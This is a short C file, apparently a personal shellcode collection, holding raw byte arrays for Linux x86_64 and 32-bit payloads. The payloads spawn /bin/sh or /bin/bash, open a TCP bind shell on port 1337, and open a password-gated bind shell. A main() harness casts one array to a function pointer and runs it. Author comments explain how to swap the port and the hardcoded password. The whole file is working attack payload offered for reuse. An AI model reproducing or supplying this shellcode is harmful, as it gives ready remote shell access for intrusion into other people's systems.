#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(){
	unsigned char shellcode[]="\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb0\x3b\x0f\x05";//<--shell code made through assembly /bin/sh
	unsigned char shellcode1[]="\x48\xbb\x62\x69\x6e\x2f\x62\x61\x73\x68\x50\x53\x48\xbb\x2f\x2f\x2f\x2f\x2f\x2f\x2f\x2f\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb0\x3b\x0f\x05";//<--- new update /bin/bash
	unsigned char remoteshell[]="\xb0\x29\x6a\x02\x6a\x01\x5e\x5f\x48\x31\xd2\x0f\x05\x48\x89\xc7\x52\x66\x68\x05\x39\x66\x6a\x02\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x48\x31\xf6\xb0\x32\x0f\x05\x48\x89\xf2\xb0\x2b\x0f\x05\x48\x89\xc7\x6a\x02\x5e\x48\x31\xc0\x48\x89\xc3\xb0\x21\x0f\x05\x48\xff\xce\x48\x39\xde\x7d\xf4\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xc0\x50\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb0\x3b\x0f\x05";
	unsigned char remoteshellwithpassword[]="\xb0\x29\x6a\x02\x6a\x01\x5e\x5f\x48\x31\xd2\x0f\x05\x48\x89\xc7\x52\x66\x68\x05\x39\x66\x6a\x02\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x48\x31\xf6\xb0\x32\x0f\x05\x48\x89\xf2\xb0\x2b\x0f\x05\x48\x89\xc7\x4d\x31\xc0\x41\x50\x48\x89\xe6\xb2\x08\x48\x31\xc0\xb0\x2d\x0f\x05\x48\x89\xe0\x48\xbb\x73\x61\x63\x68\x69\x6e\x31\x32\x4c\x89\xc1\xb2\xff\x53\x48\x21\xd3\x38\x18\x75\xd5\x5b\x48\xc1\xeb\x08\x48\xff\xc0\x48\xff\xc1\x48\x83\xf9\x05\x75\xe7\x6a\x02\x5e\x48\x31\xc0\x48\x89\xc3\xb0\x21\x0f\x05\x48\xff\xce\x48\x39\xde\x7d\xf4\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xc0\x50\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb0\x3b\x0f\x05";
	printf("size-> %d",strlen(remoteshellwithpassword));
	int(*ret)()=(int(*)())remoteshellwithpassword;
	ret();
	
	
	/*=========================================================32BIT shellcode=======================================*/
	unsigned char shellcode_32_bit[]="\x55\x89\xe5\x31\xc0\x89\xc1\x89\xca\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80";//can be optimised
	unsigned char remoteshell_32_bit[]="\x55\x89\xe5\x31\xc0\x89\xc3\x89\xd9\x89\xca\xb0\x66\xb3\x01\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\xb3\x02\x52\x52\x52\x66\x68\x04\xd2\x66\x6a\x02\x89\xe2\x6a\x10\x52\x50\x89\xe1\x31\xd2\x31\xc0\xb0\x66\xcd\x80\x31\xc0\xb0\x66\xb3\x04\x83\xc4\x04\x89\x14\x24\x83\xec\x04\xcd\x80\x31\xc0\xb0\x66\xb3\x05\x89\xe1\x83\xc4\x08\x89\x14\x24\x83\xec\x08\xcd\x80\x89\xc3\x31\xc9\xb1\x03\x49\xb0\x3f\xcd\x80\x39\xd1\x75\xf7\x31\xc0\x89\xc1\x89\xca\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\xb0\x01\xcd\x80";
	//can also be optimised further
}
/*this is my first ever shell code
use full tip
if you are crafting one for the first time use a debugger it will help you look at the contents more easily
this yields /bin/sh



NEW UPDATE

just figured this out after a few minutes 

/bin/bash shell code is "\x48\xbb\x62\x69\x6e\x2f\x62\x61\x73\x68\x50\x53\x48\xbb\x2f\x2f\x2f\x2f\x2f\x2f\x2f\x2f\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb0\x3b\x0f\x05" 


UPDATE 2
remote shell is a tcp bind shell written in x86_64 it creates a tcp socket in port number 1337 and executes /bin/sh 

if u want to change port number then just find and replace the hex representation of 1337(0x539) with the port number you want 

UPDATE 3
tcp bind with password (password here is sachin ) port number is 1337 size 160 bytes
if u wan't to change the password replace this \x73\x61\x63\x68\x69\x6e\x31\x32 to any thing you want but keep in mind the len should be the same

UPDATE 4

have done both /bin/sh and remote tcp shellcodes on 32 bit systems these can be further optimised. 
these codes have been tested on a 32 bit system and works 



*/
